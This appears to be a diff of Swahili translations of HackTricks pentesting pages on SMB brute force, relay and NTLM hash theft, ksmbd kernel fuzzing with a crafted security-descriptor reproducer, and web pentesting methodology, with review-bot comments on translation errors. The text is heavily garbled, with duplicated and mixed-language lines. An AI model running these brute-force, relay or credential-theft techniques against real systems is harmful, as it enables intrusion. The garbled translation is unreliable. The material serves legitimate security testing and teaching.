**Hii haipendekezwi — unaweza kuzuia akaunti ikiwa utazidi idadi ya jaribio zinazoruhusiwa**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB relay attack
Shambulio hili linatumia Responder toolkit ili **capture SMB authentication sessions** kwenye mtandao wa ndani, na **relays** them kwa **target machine**. Ikiwa authentication **session is successful**, it itaweka wewe moja kwa moja ndani ya **system** **shell**.\
Shambulio hili linatumia Responder toolkit kunasa **kikao za uthibitishaji za SMB** kwenye mtandao wa ndani, na **kuzirusha** kwa **mashine lengwa**. Ikiwa **kikao cha uthibitishaji kimefanikiwa**, kitatupa moja kwa moja kwenye **system** **shell**.\
[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
Maktaba ya Windows URLMon.dll hujaribu kiotomatiki authenticate kwa host wakati ukurasa unajaribu kufikia baadhi ya content kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"`
Maktaba ya Windows URLMon.dll hujaribu kwa otomatiki kuthibitisha kwa mwenyeji wakati ukurasa unapotaka kufikia baadhi ya yaliyomo kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"`
This happens with the functions:
Hii hutokea kwa functions zifuatazo:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Which are used by some browsers and tools (like Skype)
Ambazo hutumika na baadhi ya browsers na tools (like Skype)
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (358).png>)
@ -461,11 +461,11 @@ Which are used by some browsers and tools (like Skype)
## NTLM Theft
Kama kwa SMB Trapping, kuwekea faili zenye madhara kwenye target system (via SMB, for example) kunaweza kusababisha jaribio la SMB authentication, likiaruhusu NetNTLMv2 hash kukamatwa na zana kama Responder. Hash inaweza kisha kuvunjwa offline au kutumika katika [SMB relay attack](#smb-relay-attack).
Sawa na SMB Trapping, kuweka faili zenye madhara kwenye mfumo lengwa (kwa mfano kupitia SMB) kunaweza kusababisha jaribio la uthibitishaji la SMB, na kuruhusu hash ya NetNTLMv2 kunaswa kwa kutumia zana kama Responder. Hash hiyo inaweza kisha kuvunjwa offline au kutumika katika [SMB relay attack](#smb-relay-attack).
[See: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)
## HackTricks Automatic Commands
## HackTricks Amri za Otomatiki
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
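Review bot: `## **Bruteforce watumiaji credentials**` is an awkward mixed-language heading; the old `Bruteforce taarifa za kuingia za watumiaji` was clearer. The relay paragraph should state the precondition the attack depends on: relaying only works when the target does not require SMB signing (check with `crackmapexec smb <IP>`, which prints the signing state, or `nmap --script smb2-security-mode -p 445 <IP>`), and since Windows 11 24H2 and Windows Server 2025 signing is required by default, so expect failure against up-to-date hosts; the captured authentication also cannot be relayed back to the host it originated from. In the SMB-Trap section, `Ambazo hutumika na baadhi ya browsers na tools (like Skype)` still has `like` untranslated; `(kama Skype)` finishes the sentence.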

View File

@ -1,26 +1,26 @@
# ksmbd Attack Surface & SMB2/SMB3 Protocol Fuzzing (syzkaller)
# ksmbd Uso wa Mashambulizi & Fuzzing ya Protocol ya SMB2/SMB3 (syzkaller)
{{#include ../../banners/hacktricks-training.md}}
## Overview
Ukurasa huu unaelezea mbinu za vitendo za kutumia na kufuzz Linux in-kernel SMB server (ksmbd) kwa kutumia syzkaller. Unalenga kupanua attack surface ya protocol kupitia usanidi, kujenga harness ya stateful inayoweza kuunganisha operesheni za SMB2, kuzalisha PDUs zenye sarufi sahihi, kuelekeza mutations kwenye njia za msimbo zenye coverage dhaifu, na kutumia vipengele vya syzkaller kama focus_areas na ANYBLOB. Wakati utafiti wa awali ulitaja CVE maalum, hapa tunasisitiza metodolojia inayoweza kutumika tena na snippet za konkret ambazo unaweza kuiga kwa setup zako.
## Muhtasari
Ukurasa huu unafupisha mbinu za vitendo za kuendesha na kufuzz server ya SMB iliyoko ndani ya kernel ya Linux (ksmbd) kwa kutumia syzkaller. Unalenga kuongeza uso wa mashambulizi wa protocol kupitia mipangilio, kujenga harness yenye state inayoweza kuunganisha operesheni za SMB2, kuzalisha PDUs za sarufi-inayokubalika, kuingiza mabadiliko yaliyopendelea kwenye njia za msimbo zenye kufikiwa kwa udhaifu kidogo, na kutumia vipengele vya syzkaller kama focus_areas na ANYBLOB. Ingawa utafiti wa awali umeorodhesha CVE maalum, hapa tunasisitiza metodolojia inayoweza kutumika tena na vipande vya kanuni unavyoweza kurekebisha kwa mazingira yako.
Target scope: SMB2/SMB3 over TCP. Kerberos na RDMA zimetengwa kwa makusudi ili kuweka harness iwe rahisi.
Eneo linalolengwa: SMB2/SMB3 juu ya TCP. Kerberos na RDMA zimetengwa kwa makusudi ili kuweka harness rahisi.
---
## Expand ksmbd Attack Surface via Configuration
Kwa default, setup minimal ya ksmbd inabakia ikiacha sehemu kubwa za server zisijapimwa. Washa vipengele vifuatavyo ili kuendesha server kupitia parsers/handlers zaidi na kufikia njia za msimbo za ndani:
## Panua Uso wa Mashambulizi wa ksmbd kupitia Mipangilio
Kwa chaguo-msingi, usanidi mdogo wa ksmbd unaacha sehemu kubwa za server zisifanyike mtihani. Washa vipengele vifuatavyo ili kusukuma server kupitia parsers/handlers za ziada na kufikia njia za msimbo za ndani zaidi:
- Global-level
- Durable handles
- Server multi-channel
- SMB2 leases
- Per-share-level
- Oplocks (on by default)
- VFS objects
- Ngazi ya globali
- Vishikio vya kudumu (Durable handles)
- Multi-channel ya server
- Lesi za SMB2
- Kiwango kwa kila share (Per-share-level)
- Oplocks (zimwezeshwa kwa chaguo-msingi)
- Vitu vya VFS
Kuwaweka hivi huongeza utekelezaji katika moduli kama:
Kuzima/kuwasha haya kunakuza utekelezaji katika moduli kama:
- smb2pdu.c (command parsing/dispatch)
- ndr.c (NDR encode/decode)
- oplock.c (oplock request/break)
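Review bot: `Kuzima/kuwasha haya kunakuza utekelezaji` ("disabling/enabling these") inverts the point of the section, which is that enabling these features drives execution into the listed modules; `Kuwasha haya` is what the old `Kuwaweka hivi` intended. Translating the feature names in the list (`Vishikio vya kudumu`, `Lesi za SMB2`, `Vitu vya VFS`) also hides the literal configuration terms a reader has to look for in ksmbd.conf; keep `durable handles`, `SMB2 leases`, `oplocks` and `VFS objects` untranslated, with a Swahili gloss in parentheses if wanted, the way `(Durable handles)` is done for the first item.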
@ -29,27 +29,27 @@ Kuwaweka hivi huongeza utekelezaji katika moduli kama:
- vfs_cache.c (lookup cache)
Vidokezo
- Chaguo halisi zinategemea userspace ya ksmbd ya distro yako (ksmbd-tools). Kagua /etc/ksmbd/ksmbd.conf na sehemu za per-share ili kuanzisha durable handles, leases, oplocks na VFS objects.
- Multi-channel na durable handles hubadilisha state machines na lifetimes, mara nyingi kuibua UAF/refcount/OOB bugs chini ya concurrency.
- Chaguo halisi zinategemea userspace ya ksmbd ya distro yako (ksmbd-tools). Pitia /etc/ksmbd/ksmbd.conf na sehemu za kila-share ili kuwezesha durable handles, lesi, oplocks na vitu vya VFS.
- Multi-channel na durable handles hubadilisha state machines na maisha ya vitu, mara nyingi zikiibua mdudu wa UAF/refcount/OOB chini ya ulandanishi.
---
## Authentication and Rate-Limiting Adjustments for Fuzzing
SMB3 inahitaji session halali. Kutekeleza Kerberos katika harness hukongeza ugumu, kwa hiyo penda kutumia NTLM/guest kwa fuzzing:
## Marekebisho ya Uthibitishaji na Kuzuia-Kiwango kwa Fuzzing
SMB3 inahitaji session halali. Kuweka Kerberos katika harness kunaongeza ugumu, hivyo upendeleo ni NTLM/guest kwa fuzzing:
- Ruhusu guest access na weka map to guest = bad user ili watumiaji wasiojulikana warejewe kwa GUEST.
- Kubali NTLMv2 (tengeneza patch policy ikiwa imezimwa). Hii inafanya handshake iwe rahisi wakati ikifanya exercise code paths za SMB3.
- Ondoa ukaguzi mkali wa credit wakati wa majaribio (post-hardening kwa CVE-2024-50285 ilifanya simultaneous-op crediting kuwa mkali zaidi). Vinginevyo, rate-limits zinaweza kukataa mfululizo wa fuzzed mapema sana.
- Ruhusu upatikanaji wa guest na weka map to guest = bad user ili watumiaji wasiojulikana waangukie GUEST.
- Kubali NTLMv2 (rekebisha policy ikiwa imezimwa). Hii huweka handshake rahisi huku ikifanyia kazi njia za msimbo za SMB3.
- Rekebisha au zima ukaguzi mkali wa credit wakati wa majaribio (kuimarishwa baada ya hardening kwa CVE-2024-50285 kulitengeneza crediting ya simultaneous-op kuwa kali zaidi). Vinginevyo, vikwazo vya kiwango vinaweza kukataa mfululizo wa fuzzed mapema sana.
- Ongeza max connections (mfano, hadi 65536) ili kuepuka kukataliwa mapema wakati wa fuzzing yenye throughput kubwa.
Tahadhari: Taa marekebisho haya ni kwa ajili ya kuwezesha fuzzing pekee. Usitengeneze deployment na mipangilio hii kwenye uzalishaji.
Tahadhari: Laghilafu hizi ni kwa ajili ya kuwezesha fuzzing pekee. Usitumiwe na mipangilio hii katika uzalishaji.
---
## Stateful Harness: Extract Resources and Chain Requests
SMB ni stateful: maombi mengi yanategemea identifiers zinazorejeshwa na majibu ya awali (SessionId, TreeID, FileID pairs). Harness yako lazima iparse majibu na itumie IDs ndani ya programu ile ile ili kufikia handlers za ndani (mfano, smb2_create → smb2_ioctl → smb2_close).
## Stateful Harness: Tenga Rasilimali na Kuunganisha Maombi
SMB ni stateful: maombi mengi yanategemea vitambulisho vinavyorejeshwa na majibu ya awali (SessionId, TreeID, jozi za FileID). Harness yako lazima ichambue majibu na itumie tena IDs ndani ya programu ileile ili kufikia handlers za ndani (mfano, smb2_create → smb2_ioctl → smb2_close).
Example snippet to process a response buffer (skipping the +4B NetBIOS PDU length) and cache IDs:
Mfano wa kipande cha kanuni cha kushughulikia response buffer (kutoruhusu +4B NetBIOS PDU length) na kuhifadhi IDs:
```c
// process response. does not contain +4B PDU length
void process_buffer(int msg_no, const char *buffer, size_t received) {
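Review bot: The warning line in this hunk is garbled on both sides and the replacement does not fix it: "Tahadhari: Laghilafu hizi ni kwa ajili ya kuwezesha fuzzing pekee. Usitumiwe na mipangilio hii katika uzalishaji." contains a non-word ("Laghilafu") and an ungrammatical verb ("Usitumiwe"); it should read "Tahadhari: marekebisho haya ni kwa ajili ya kuwezesha fuzzing pekee. Usitumie mipangilio hii katika uzalishaji." The lead-in for the snippet also mistranslates "skipping": "kutoruhusu +4B NetBIOS PDU length" means disallowing the length prefix, whereas the code skips over it, so "kuruka +4B NetBIOS PDU length" is the intended sense. Since these lines describe settings that deliberately weaken authentication and credit checks, the warning is the one sentence in the section that must be unambiguous.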
@ -76,13 +76,13 @@ break;
}
```
Vidokezo
- Weka mchakato mmoja wa fuzzer unaoshirikia authentication/state: utulivu na coverage bora na ksmbds global/session tables. syzkaller bado huingiza concurrency kwa kuashiria ops async, na rerun ndani.
- reset_acc_state ya majaribio ya Syzkaller inaweza kureset global state lakini inaweza kusababisha slowdown kubwa. Pendelea utulivu na kuzingatia fuzzing badala yake.
- Tumia mchakato mmoja wa fuzzer unaoshiriki authentication/state: hutoa uthabiti na coverage bora kutokana na ksmbds global/session tables. syzkaller bado huingiza concurrency kwa kuashiria ops kuwa async; hufanya rerun internally.
- Syzkallers experimental reset_acc_state inaweza kurudisha global state lakini inaweza kusababisha slowdown kubwa ya utendaji. Pendelea uthabiti na zingatia fuzzing badala yake.
---
## Grammar-Driven SMB2 Generation (Valid PDUs)
Tafsiri miundo ya SMB2 kutoka Microsoft Open Specifications kuwa sarufi ya fuzzer ili generator yako itengeneze PDUs halali kimuundo, ambazo zinawafikia dispatchers na IOCTL handlers kwa mfumo.
## Uundaji wa SMB2 Unaotokana na Sarufi (PDUs Halali)
Tafsiri muundo wa Microsoft Open Specifications SMB2 kuwa sarufi ya fuzzer ili generator yako izalisha PDUs zenye muundo sahihi, ambazo zinafikia kwa mfumo dispatchers na IOCTL handlers.
Mfano (SMB2 IOCTL request):
```
@ -107,12 +107,12 @@ Input array[int8]
Output array[int8]
} [packed]
```
Mtindo huu unalazimisha structure sizes/offsets sahihi na huboresha kwa kiasi kikubwa coverage ikilinganishwa na blind mutation.
Mtindo huu unalazimisha ukubwa na offsets sahihi za miundo na kuboresha kwa kiasi kikubwa coverage ikilinganishwa na blind mutation.
---
## Directed Fuzzing With focus_areas
Tumia syzkallers experimental focus_areas kuipa uzito zaidi functions/files maalum ambazo kwa sasa zina coverage dhaifu. Mfano wa JSON:
Tumia syzkallers experimental focus_areas kuzipa uzito maalum functions/files ambazo kwa sasa zina coverage dhaifu. Mfano JSON:
```json
{
"focus_areas": [
@ -122,9 +122,9 @@ Tumia syzkallers experimental focus_areas kuipa uzito zaidi functions/files m
]
}
```
Hii husaidia kujenga ACLs halali ambazo zinafikia arithmetic/overflow paths katika smbacl.c. Kwa mfano, Security Descriptor mbaya yenye dacloffset kubwa kupita kiasi husababisha integer-overflow.
Hii husaidia kujenga ACLs halali ambazo zinafikia arithmetic/overflow paths katika smbacl.c. Kwa mfano, Security Descriptor yenye nia mbaya na dacloffset kubwa inasababisha integer-overflow.
Mjenzi wa reproducer (minimal Python):
Reproducer builder (minimal Python):
```python
def build_sd():
import struct
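Review bot: The lead-in for the reproducer goes the wrong direction for a translation commit: "Mjenzi wa reproducer (minimal Python):" is replaced by the English "Reproducer builder (minimal Python):", so the Swahili page gains an English line it did not have before; keep the Swahili line. The snippet itself imports struct inside build_sd(), which works, but a module-level import is the usual style and is what a reader copying the function will expect.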
@ -143,8 +143,8 @@ return bytes(sd)
```
---
## Kuvunja Mipaka ya Coverage kwa ANYBLOB
anyTypes ya syzkaller (ANYBLOB/ANYRES) zinaruhusu kupunguza miundo tata kuwa blobs zinazobadilika kwa njia ya jumla. Anzisha corpus mpya kutoka kwa public SMB pcaps na badilisha payloads kuwa programu za syzkaller zinazoita pseudo-syscall yako (mfano, syz_ksmbd_send_req):
## Kuvunja Plateau za Coverage kwa ANYBLOB
syzkallers anyTypes (ANYBLOB/ANYRES) zinawezesha kupunguza miundo tata kuwa blobs zinazobadilika kwa njia ya jumla. Tengeneza corpus mpya kutoka kwa SMB pcaps za umma na ubadilishe payloads kuwa programu za syzkaller zinazoiita pseudo-syscall yako (mfano, syz_ksmbd_send_req):
```bash
# Extract SMB payloads to JSON
# tshark -r smb2_dac_sample.pcap -Y "smb || smb2" -T json -e tcp.payload > packets.json
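Review bot: The replacement sentence introduces a typo the original line did not have: "programu za syzkaller zinazoiita pseudo-syscall yako" should be "zinazoita", as in the line it replaces. Note also that the extraction command is shown commented out ("# tshark -r smb2_dac_sample.pcap ..."), which is fine as documentation but is a no-op if pasted as-is; a short sentence saying it must be uncommented, or dropping the leading "# ", would avoid confusion.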
@ -167,14 +167,14 @@ f.write(
f"syz_ksmbd_send_req(&(&(0x7f0000000340))=ANY=[@ANYBLOB=\"{pdu}\"], {hex(pdu_size)}, 0x0, 0x0)"
)
```
Hii inaanzisha uchunguzi kwa haraka na inaweza kusababisha mara moja UAFs (mfano, katika ksmbd_sessions_deregister) huku ikiongezea coverage kwa asilimia chache.
Hii inaanzisha uchunguzi kwa haraka na inaweza kusababisha UAFs mara moja (kwa mfano, katika ksmbd_sessions_deregister) huku ikiongezea coverage kwa asilimia chache.
---
## Sanitizers: Zaidi ya KASAN
- KASAN bado ni chombo kuu cha kugundua heap bugs (UAF/OOB).
- KCSAN mara nyingi hutoa false positives au low-severity data races kwa lengo hili.
- UBSAN/KUBSAN zinaweza kugundua makosa ya declared-bounds ambayo KASAN hupoteza kutokana na semantiki za index za array. Mfano:
## Sanitizers: Beyond KASAN
- KASAN bado ni kifuatilia/chombo kuu cha kugundua hitilafu za heap (UAF/OOB).
- KCSAN mara nyingi huonyesha false positives au data races zenye uzito mdogo katika lengo hili.
- UBSAN/KUBSAN inaweza kugundua declared-bounds mistakes ambazo KASAN hupoteza kutokana na array-index semantics. Mfano:
```c
id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
struct smb_sid {
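Review bot: The heading in this hunk regresses to English: "## Sanitizers: Zaidi ya KASAN" is replaced by "## Sanitizers: Beyond KASAN", and the UBSAN bullet does the same mid-sentence, turning "makosa ya declared-bounds" into "declared-bounds mistakes"; keep the Swahili heading and bullet. The KASAN bullet also hedges with two nouns ("kifuatilia/chombo kuu"); a single term ("chombo kuu") reads better and matches the line it replaces.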
@ -182,28 +182,28 @@ __u8 revision; __u8 num_subauth; __u8 authority[NUM_AUTHS];
__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
} __attribute__((packed));
```
Kuweka num_subauth = 0 husababisha in-struct OOB read ya sub_auth[-1], inayogunduliwa na UBSANs declared-bounds checks.
Kuweka num_subauth = 0 husababisha in-struct OOB read ya sub_auth[-1], iliyogunduliwa na ukaguzi wa declared-bounds wa UBSAN.
---
## Vidokezo kuhusu Throughput na Parallelism
- Mchakato mmoja wa fuzzer (shared auth/state) huwa imara zaidi kwa ksmbd na bado huibua races/UAFs shukrani kwa syzkallers internal async executor.
- Kwa VM nyingi, bado unaweza kufikia mamia ya amri za SMB/sekunde kwa ujumla. Coverage ya ngazi ya function takriban ~60% ya fs/smb/server na ~70% ya smb2pdu.c inapatikana, ingawa coverage ya state-transition haionyeshwi ipasavyo na metriksi hizi.
## Throughput and Parallelism Notes
- Mchakato mmoja wa fuzzer (shared auth/state) huwa thabiti zaidi kwa ksmbd na bado huibua races/UAFs kutokana na executor ya ndani async ya syzkaller.
- Kwa VMs nyingi, bado unaweza kufikia mamia ya amri za SMB/sekunde jumla. Ufunikaji wa ngazi ya function takriban ~60% ya fs/smb/server na ~70% ya smb2pdu.c unaweza kupatikana, ingawa ufunikaji wa state-transition hauwakilishwa vya kutosha na metriki hizo.
---
## Orodha ya Kivitendo
- Washa durable handles, leases, multi-channel, oplocks, na VFS objects katika ksmbd.
- Ruhusu guest na map-to-guest; kubali NTLMv2. Patch out credit limits na ongeza max connections kwa utulivu wa fuzzer.
## Practical Checklist
- Washa durable handles, leases, multi-channel, oplocks, na VFS objects ndani ya ksmbd.
- Ruhusu guest na map-to-guest; kubali NTLMv2. Patch out credit limits na ongeza max connections kwa uthabiti wa fuzzer.
- Jenga stateful harness inayohifadhi SessionId/TreeID/FileIDs na kuunganisha create → ioctl → close.
- Tumia grammar kwa SMB2 PDUs ili kudumisha uhalali wa muundo.
- Tumia focus_areas kuwekeza zaidi kwenye functions zenye coverage dhaifu (mifano, smbacl.c njia kama smb_check_perm_dacl).
- Changanya na ANYBLOB kutoka kwenye pcaps halisi kuvunja plateaus; pakia seeds na syz-db kwa matumizi tena.
- Endesha kwa KASAN + UBSAN; fanyia triage kwa uangalifu ripoti za UBSAN declared-bounds.
- Tumia sarufi (grammar) kwa SMB2 PDUs ili kudumisha uhalali wa muundo.
- Tumia focus_areas kuipa uzito zaidi weakly-covered functions (e.g., smbacl.c paths like smb_check_perm_dacl).
- Seed with ANYBLOB kutoka pcaps halisi ili kuvunja plateaus; pack seeds na syz-db kwa matumizi ya baadaye.
- Endesha na KASAN + UBSAN; pitia ripoti za UBSAN za declared-bounds kwa uangalifu.
---
## Marejeo
## References
- Doyensec ksmbd Fuzzing (Part 2): https://blog.doyensec.com/2025/09/02/ksmbd-2.html
- syzkaller: https://github.com/google/syzkaller
- ANYBLOB/anyTypes (commit 9fe8aa4): https://github.com/google/syzkaller/commit/9fe8aa4
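Review bot: Three section headings in this hunk flip from Swahili back to English ("## Orodha ya Kivitendo" becomes "## Practical Checklist", "## Marejeo" becomes "## References", and the throughput heading likewise), and two checklist items follow suit ("Tumia focus_areas kuipa uzito zaidi weakly-covered functions (e.g., smbacl.c paths like smb_check_perm_dacl)" and the "Seed with ANYBLOB ..." item), where the lines they replace were fully Swahili; keep the earlier Swahili versions. The checklist item "Patch out credit limits na ongeza max connections" should also carry the same production warning given in the authentication section, since a reader who only skims the checklist would otherwise take it as a deployment recommendation.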
@ -214,6 +214,6 @@ Kuweka num_subauth = 0 husababisha in-struct OOB read ya sub_auth[-1], inayogund
- KCSAN: https://docs.kernel.org/dev-tools/kcsan.html
- Microsoft Open Specifications (SMB): https://learn.microsoft.com/openspecs/
- Wireshark Sample Captures: https://wiki.wireshark.org/SampleCaptures
- Usomaji wa nyongeza: pwning.tech “Tickling ksmbd: fuzzing SMB in the Linux kernel”; Dongliang Mus syzkaller notes
- Background reading: pwning.tech “Tickling ksmbd: fuzzing SMB in the Linux kernel”; Dongliang Mus syzkaller notes
{{#include ../../banners/hacktricks-training.md}}
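Review bot: The last reference entry swaps a Swahili label for an English one: "Usomaji wa nyongeza:" becomes "Background reading:", the opposite of what a translation commit should do; keep "Usomaji wa nyongeza:". In the same entry "Dongliang Mus syzkaller notes" is missing the possessive apostrophe ("Mu's") on both sides, and it is the only reference in the list without a URL, so adding a link or the article title would make it verifiable.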

View File

@ -1,10 +1,10 @@
# 80,443 - Pentesting Wavuti Mbinu
# 80,443 - Pentesting Web Mbinu
{{#include ../../banners/hacktricks-training.md}}
## Taarifa za Msingi
## Taarifa Msingi
Huduma ya wavuti ndiyo **huduma inayotokea zaidi na yenye upeo mpana**, na kuna **aina nyingi tofauti za udhaifu**.
Huduma ya wavuti ni huduma inayotumika sana na **yenye upeo mpana**, na kuna **aina tofauti za vulnerabilities**.
**Bandari ya chaguo-msingi:** 80 (HTTP), 443(HTTPS)
```bash
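Review bot: The new page title reads awkwardly in Swahili: "# 80,443 - Pentesting Web Mbinu" puts the noun after its qualifier; "# 80,443 - Mbinu za Pentesting Web" is the natural order (the replaced "Pentesting Wavuti Mbinu" had the same problem). The subheading also drops the connective: "## Taarifa Msingi" should stay "## Taarifa za Msingi" as in the line it replaces. In the intro sentence the bold was moved off "inayotokea zaidi" so only "yenye upeo mpana" is emphasised; if the emphasis on "most common" is intended, keep both bolded as before.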
@ -24,31 +24,31 @@ openssl s_client -connect domain.com:443 # GET / HTTP/1.0
web-api-pentesting.md
{{#endref}}
## Muhtasari wa Mbinu
## Muhtasari wa metodolojia
> Katika mbinu hii tutachukulia kwamba unalenga domain (au subdomain) na tu hiyo. Kwa hivyo, unapaswa kutumia mbinu hii kwa kila domain, subdomain au IP iliyogunduliwa ambayo ina web server isiyotambulika ndani ya upeo.
> Katika metodolojia hii tutadhani kwamba unamilenga kujaribu domain (au subdomain) na ndiyo tu. Kwa hivyo, unapaswa kutumia metodolojia hii kwa kila domain, subdomain au IP iliyogunduliwa yenye server ya wavuti isiyothibitishwa ndani ya scope.
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumika na web server. Tafuta **tricks** za kuzingatia wakati wa mtihani ukifanikiwa kutambua tech.
- [ ] Kuna **udhaifu unaojulikana** wa toleo la teknolojia?
- [ ] Unatumia **well known tech**? Kuna **useful trick** yoyote ya kupata taarifa zaidi?
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumika na server ya wavuti. Tafuta **tricks** za kukumbuka selama ya mtihani ikiwa unaweza kutambua tech kwa mafanikio.
- [ ] Je kuna **udhaifu uliotambuliwa** wa toleo la teknolojia?
- [ ] Unatumia **tech** yoyote inayojulikana? Kuna **trick muhimu** ya kupata taarifa zaidi?
- [ ] Kuna **specialised scanner** ya kuendesha (kama wpscan)?
- [ ] Endesha **general purposes scanners**. Huwezi kujua kama zitapata kitu au zitapata taarifa za kuvutia.
- [ ] Anza na **initial checks**: **robots**, **sitemap**, **404** error na **SSL/TLS scan** (if **HTTPS**).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** yote yanayowezekana ya **faili, folda** na **parameters being used.** Pia, angalia **special findings**.
- [ ] _Kumbuka kwamba kila unapogundua saraka mpya wakati wa brute-forcing au spidering, inapaswa kuwa spidered._
- [ ] **Directory Brute-Forcing**: Jaribu brute force saraka zote zilizogunduliwa ukitafuta faili na directories mpya.
- [ ] _Kumbuka kwamba kila unapogundua saraka mpya wakati wa brute-forcing au spidering, inapaswa kuwa Brute-Forced._
- [ ] **Backups checking**: Jaribu kuona kama unaweza kupata **backups** za **faili zilizogunduliwa** kwa kuongezea extensions za backup zinazojulikana.
- [ ] **Brute-Force parameters**: Jaribu **kutafuta vigezo vilivyo fiche**.
- [ ] Mara tu umeshapata na **tambulisha** yote yanayowezekana **endpoints** zinazopokea **user input**, angalia aina zote za **vulnerabilities** zinazohusiana nazo.
- [ ] [Fuata orodha hii](../../pentesting-web/web-vulnerabilities-methodology.md)
- [ ] Endesha **general purposes scanners**. Huwezi kujua ikiwa zitapata kitu au ikiwa zitapata taarifa za kuvutia.
- [ ] Anza na **initial checks**: **robots**, **sitemap**, **404** error na **SSL/TLS scan** (ikiwa HTTPS).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** faili zote, folder zote na **parameters zinazotumika.** Pia, angalia **special findings**.
- [ ] _Kumbuka kwamba kila wakati directory mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kuspidering._
- [ ] **Directory Brute-Forcing**: Jaribu brute force folder zote zilizogunduliwa unatafuta **faili** mpya na **direktori**.
- [ ] _Kumbuka kwamba kila wakati directory mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kuongezewa Brute-Forced._
- [ ] **Backups checking**: Jaribu kama unaweza kupata **backups** za **faili zilizogunduliwa** kwa kuongeza extensions za kawaida za backup.
- [ ] **Brute-Force parameters**: Jaribu **kupata vigezo vilivyo fiche**.
- [ ] Mara tu unapokuwa umetoa orodha ya yote ya **endpoints** zinazopokea **user input**, angalia aina zote za **udhaifu** zinazohusiana nazo.
- [ ] [Follow this checklist](../../pentesting-web/web-vulnerabilities-methodology.md)
## Toleo la Server (Vulnerable?)
## Server Version (Vulnerable?)
### Tambua
Angalia kama kuna **udhaifu unaojulikana** kwa **toleo** la server linaloendesha.\
**HTTP headers** na **cookies** za response zinaweza kuwa muhimu sana kutambua **teknolojia** na/au **toleo** zinazotumika. **Nmap scan** inaweza kutambua toleo la server, lakini pia inaweza kuwa muhimu zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech) au [**https://builtwith.com/**](https://builtwith.com)**:**
Kagua kama kuna **udhaifu uliotambulika** kwa toleo la server linaloendesha.\
The **HTTP headers and cookies of the response** could be very useful to **identify** the **technologies** and/or **version** being used. **Nmap scan** can identify the server version, but it could also be useful the tools [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)or [**https://builtwith.com/**](https://builtwith.com)**:**
```bash
whatweb -a 1 <URL> #Stealthy
whatweb -a 3 <URL> #Aggresive
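Review bot: This hunk introduces typos in the methodology blockquote and checklist that the replaced lines did not have: "unamilenga kujaribu domain" (should be "unalenga") and "Tafuta tricks za kukumbuka selama ya mtihani" ("selama" is not Swahili; "wakati wa mtihani" as before). It also reverts three places to English in a Swahili file: "[Follow this checklist]", "## Server Version (Vulnerable?)" and the whole paragraph beginning "The HTTP headers and cookies of the response could be very useful ..."; keep the Swahili versions. The unchanged context line "whatweb -a 3 <URL> #Aggresive" has a long-standing spelling error in the comment ("Aggressive") that is worth fixing while the file is being touched.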
@ -65,7 +65,7 @@ Tafuta [**vulnerabilities of the web application** **version**](../../generic-ha
### Mbinu za teknolojia za wavuti
Baadhi ya **mbinu** za **finding vulnerabilities** katika teknolojia maarufu tofauti zinazotumika:
Baadhi ya **mbinu** za **kupata vulnerabilities** katika **technologies** mbalimbali maarufu zinazotumika:
- [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
- [**Apache**](apache.md)
@ -102,27 +102,27 @@ Baadhi ya **mbinu** za **finding vulnerabilities** katika teknolojia maarufu tof
- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/index.html)
- [**Sitecore**](sitecore/index.html)
_Zingatia kwamba **same domain** inaweza kutumia **different technologies** katika **ports**, **folders** na **subdomains**._\
Ikiwa web application inatumia **tech/platform listed before** au **any other**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
_Chukua akilini kwamba **same domain** inaweza kutumia **different technologies** katika **ports**, **folders** na **subdomains**._
Ikiwa programu ya wavuti inatumia yoyote ya **teknolojia/jukwaa iliyotajwa hapo juu** au **nyingine yoyote**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
### Mapitio ya Source Code
### Mapitio ya Msimbo Chanzo
Ikiwa **source code** ya application inapatikana kwenye **github**, mbali na kufanya kwa **your own a White box test** ya application kuna **some information** ambazo zinaweza kuwa **useful** kwa **Black-Box testing** ya sasa:
Ikiwa **source code** ya programu inapatikana kwenye **github**, mbali na kufanya kwa **wewe mwenyewe a White box test** ya programu, kuna **taarifa** ambazo zinaweza kuwa **zitumike** kwa sasa **Black-Box testing**:
- Je, kuna faili ya **Change-log or Readme or Version** au kitu chochote chenye **version info accessible** kupitia wavuti?
- Je, **credentials** zimehifadhiwa vipi na wapi? Je, kuna (inayoweza kupatikana?) **file** yenye credentials (usernames au passwords)?
- Je, **passwords** ziko katika **plain text**, **encrypted** au ni algorithimu gani ya **hashing algorithm** inatumiwa?
- Je, inatumia **master key** yoyote kwa ku-encrypt kitu? Ni **algorithm** gani inatumiwa?
- Vipi na wapi **credentials** zimehifadhiwa? Je, kuna (**inayopatikana?**) **file** yenye credentials (majina ya watumiaji au nywila)?
- Je, **passwords** ziko kwa **plain text**, **encrypted** au ni algorithimu gani ya **hashing** inayotumika?
- Je, inatumia **master key** yoyote kwa kusimba kitu? Ni **algorithm** gani inatumiwa?
- Je, unaweza **access any of these files** ukitumia udhaifu fulani?
